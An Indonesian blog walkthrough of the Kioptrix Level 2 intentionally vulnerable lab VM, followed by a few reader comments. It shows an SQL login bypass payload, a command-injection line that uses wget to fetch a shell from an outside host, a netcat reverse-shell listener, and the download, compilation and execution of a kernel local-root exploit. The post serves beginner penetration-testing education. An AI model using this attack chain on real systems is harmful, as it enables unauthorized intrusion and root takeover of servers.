Kioptrix Level 2 - Command Injection and Server Rooting

Kali ini saya akan menulis pembahasan dari Kioptrix Level 2 Challenge. Kioptrix sendiri adalah Oracle VM Image yang dirancang khusus untuk mendalami dasar dasar dari keamanan website dan jaringan. Jadi OS nya memang didesain vulnerable. Goal dari challenge Kioptrix sendiri adalah mendapatkan root access dari OS tadi, bagaimanapun cara nya. Sehingga kita bebas untuk masuk melalui celah apapun yang terbuka.
Oke langsung saja ya.
Jalankan di Oracle VM.
nanti tampilanya seperti ini .
Nah seperti yang terlihat, disitu kalian tidak bisa masuk ke OS nya . Harus login . Dan kita tidak tau password nya apa, sehingga untuk mendapatkan akses kedalam nya kita harus menemukan celah.
Yep.. saatnya penetrasi.
Sebagai catatan, OS yang saya gunakan adalah Ubuntu yang sudah dilengkapi dengan tools pentest dari BackBox.
Oke, pertama, kita harus tau IP dari Kioptrix ini terlebih dahulu.
Kita scan via nmap.
uzumaki@linuxsec:~$ nmap -sn 192.168.43.1/24
-sn sendiri adalah perintah ping scan, maka akan terlihat host mana saja yang up. Berhubung yang saya gunakan adalah wifi pribadi, sehingga mudah saya ditemukan ip nya.
Setelah itu, buka IP Kioptrix tadi via browser.

Kita coba bypass sql login dengan user dan password '=' 'or'
Ternyata tembus.
Bagi yang belum tau tentang Bypass SQL Login, bisa baca baca disini :
Saya skip skip saja ya tulisannya. Di akhir tulisan nanti saya lampirkan video nya jika kurang jelas.
Setelah beberapa kali dilakukan percobaan akhirnya diketahui kalau selain untuk pelakukan ping, kolom diatas juga bisa melakukan perintah perintah linux.
Tentu saja dengan command injection.
Disini saya akan melakukan back connect sehingga saya mengupload BackConnect Shell ke target.
command nya :
;wget http://serverkita/shell.txt -O /tmp/shell.php
Kita mengupload di folder /tmp karena hanya folder itu yang writable.
Untuk Shell nya silahkan download disini :
Sesuaikan sendiri untuk ip dan port nya.
Selanjutya, kita buka terminal di main OS.
masukkan command :
uzumaki@linuxsec:~$ sudo nc -l 1337
1337 adalah port yang saya gunakan untuk back connect . Sama kan dengan yang ada di shell.
Nah , di web Kioptrix nya tadi, masukkan command :
;php /tmp/shell.php
Sesuaikan dengan nama shell mu.
Maka di terminal akan terbuka shell, namun masih regular user.
Sekarang masukkan command uname -a untuk mengetahui versi kernel yang digunakan target.
Nah, kernel yang digunakan lumayan sudah tua. jadi kemungkinan ada di Exploit-DB . kalian bisa cek sendiri di exploit-db dengan memasukkan versi kernel yang tertera.
Berhubung saya punya searchsploit, saya tinggal mencari nya lewat terminal.
bagi yang ingin menginstall bisa ikuti tutorial dibawah ini :
Oke lanjut, masukkan command :
uzumaki@linuxsec:~$ searchsploit kernel 2.6 root
Itu keyword yang saya gunakan untuk mencari localroot kernel 2.6 yang digunakan kioptrix.
Ada banyak output nya. Saya coba yang ring0 Root Exploit.
Lalu kita copy file .c nya ke /var/www/html agar bisa didownload.
uzumaki@linuxsec:~$ cp /path/to/searchsploit/localroot.c /var/www/html/root.c
Selanjutnya dari shell yang didapat dari back connect sebelumnya, kita download dan kita compile exploit tadi.
sh-3.00$ cd /tmp
sh-3.00$ wget http://serverkita/root.c /tmp/root.c
sh-3.00$ gcc root.c -o rootme
sh-3.00$ chmod +x rootme

Lalu kita jalankan exploit nya dengan command :
sh-3.00$ ./rootme
Maka kalian akan masuk ke root.
sh-3.00# whoami
root
Misi terselesaikan..
Bagi yang kurang jelas bisa lihat video dibawah :

Mungkin kurang menantang bagi kalian yang sudah expert di bidang pentesting, tapi sekali lagi tujuan dari Kioptrix sendiri adalah untuk pembelajaran dasar, sehinga lebih diperuntukkan kepada pemula yang ingin tahu bagaimana alur serangan dilakukan.
jadi buat kalian yang masih awam, silahkan mencoba.
Sekian tutorial kali ini, semoga bermanfaat, share juga ke teman temanmu biar mereka tau.

3 komentar untuk "Kioptrix Level 2 - Command Injection and Server Rooting"

Comment Author Avatar
Gan ubuntu diinstall tools backbox apakah tidak merusak repo ?
Comment Author Avatar
sudo nc -l 1337 kok ip nya ga diikutin ya? apa karna localhost..
Comment Author Avatar
sejak kapan back connect nc ip nya diikutin

Silahkan tinggalkan komentar jika ada masukan, pertanyaan, kritik ataupun dukungan. Namun pastikan untuk berkomentar secara sopan.